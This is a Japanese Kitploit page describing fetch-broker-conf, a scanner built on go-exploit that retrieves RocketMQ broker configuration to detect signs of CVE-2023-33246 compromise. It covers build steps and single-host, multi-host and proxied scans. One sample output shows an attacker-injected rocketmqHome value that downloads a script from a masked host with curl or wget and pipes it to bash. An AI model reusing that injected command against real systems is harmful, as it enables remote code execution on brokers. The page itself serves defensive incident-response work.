Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
fetch-broker-conf — CVE-2023-33246 の侵害インジケータを発見するために、RocketMQ ブローカーの設定を取得する go-exploit。 | Kitploit
ツール/GitHubGitHub/vulncheck-oss/fetch-broker-conf
侵害指標 (IOC) 管理脆弱性分析エクスプロイト情報収集ペネトレーションテストインシデントレスポンス
GitHubvulncheck-oss/fetch-broker-conf

fetch-broker-conf

CVE-2023-33246 の侵害インジケータを発見するために、RocketMQ ブローカーの設定を取得する go-exploit。

リポジトリを見る
511年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

Fetch Broker Configuration

Fetch Broker Configuration は、侵害の指標を rocketmqHome 変数内で探すために、RocketMQ ブローカー設定のダウンロードを試みます。この変数は、CVE-2023-33246 を介してコードを実行するために様々な攻撃者によって利用されます。詳細については、VulnCheck ブログ を参照してください。

コンパイル

Docker コンテナをビルドするには makefile を使用できます:

root@kitploit:~
make docker

または、Go ビルド環境が整っている場合は、単に make を使用してください:

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ make
gofmt -d -w main.go
golangci-lint run --fix main.go
GOOS=linux GOARCH=arm64 go build -o build/main_linux-arm64 main.go

使い方

このツールは go-exploit 上に構築されているため、スキャン対象を指定する方法は複数あります。完全な説明はプロジェクトの スキャンに関するドキュメント にあります。以下にいくつかの例を示します:

単一ホストのスキャン

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhost 10.9.49.143 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:27:48.567836165-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}

複数ホストのスキャン

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts 10.9.49.143,10.9.49.150 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:34:27.505747211-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}
{
  "time": "2023-09-05T05:34:27.802345043-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.150",
  "port": 10911
}

プロキシを使用したホストファイルのスキャン

go-exploit は、指定されたターゲット CSV を使用したスキャン機能を提供します。CSV の形式は host, port, anything if ssl is enabled です(-a を使用した場合、SSL フィールドは無視されます)。また、プロキシを経由したスキャンも可能です。コマンドは次のようになります(-a は SSL 自動検出であることに注意してください):

root@kitploit:~
albinolobster@mournland:~/rocketmq-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts-file /tmp/rocketmq.csv -proxy socks5://127.0.0.1:9050 -log-json true 2>/dev/null | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-08-31T13:45:35.781849255-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "-c $@|sh . echo (curl -s x.x.x.x/rm.sh||wget -q -O- x.x.x.x/rm.sh)|bash;",
  "host": "x.x.x.x",
  "port": 10909
}
ツールをダウンロード